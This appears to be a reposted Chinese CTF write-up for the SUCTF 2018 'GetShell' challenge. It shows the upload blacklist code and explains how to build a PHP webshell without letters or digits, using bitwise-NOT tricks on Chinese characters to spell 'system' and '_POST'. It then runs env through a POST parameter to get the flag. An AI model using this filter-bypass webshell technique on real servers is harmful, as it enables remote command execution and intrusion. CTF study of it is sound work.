首页 > 系统服务 > 详细

[SUCTF 2018]GetShell

时间:2020-07-29 22:29:28      阅读:188      评论:0      收藏:0      [点我收藏+]

[SUCTF 2018]GetShell

在upload页面看到源码

文件包含题,包含我们上传的文件。传一个图片马,发现被ban了

if($contents=file_get_contents($_FILES["file"]["tmp_name"])){
    $data=substr($contents,5);
    foreach ($black_char as $b) {
        if (stripos($data, $b) !== false){
            die("illegal char");
        }
    }     
} 

需要测试看看哪些被过滤了。

经过测试发现基本都被过滤了,只剩下$().;=[]]_~这些可以利用

想到之前看的一篇博文:不用字母和数字进行构造webshell

离别歌的博文https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

echo ~茉[$____];//s
echo ~内[$____];//y
echo ~茉[$____];//s
echo ~苏[$____];//t
echo ~的[$____];//e
echo ~咩[$____];//m
echo ~课[$____];//P
echo ~尬[$____];//O
echo ~笔[$____];//S
echo ~端[$____];//T
echo ~瞎[$____];//a

上传一个php文件后,可以用$_POST[a]来执行系统命令

hackbar传一个a=env,列出所有环境变量即可得到flag

技术分享图片

[SUCTF 2018]GetShell

原文:https://www.cnblogs.com/LEOGG321/p/13398911.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!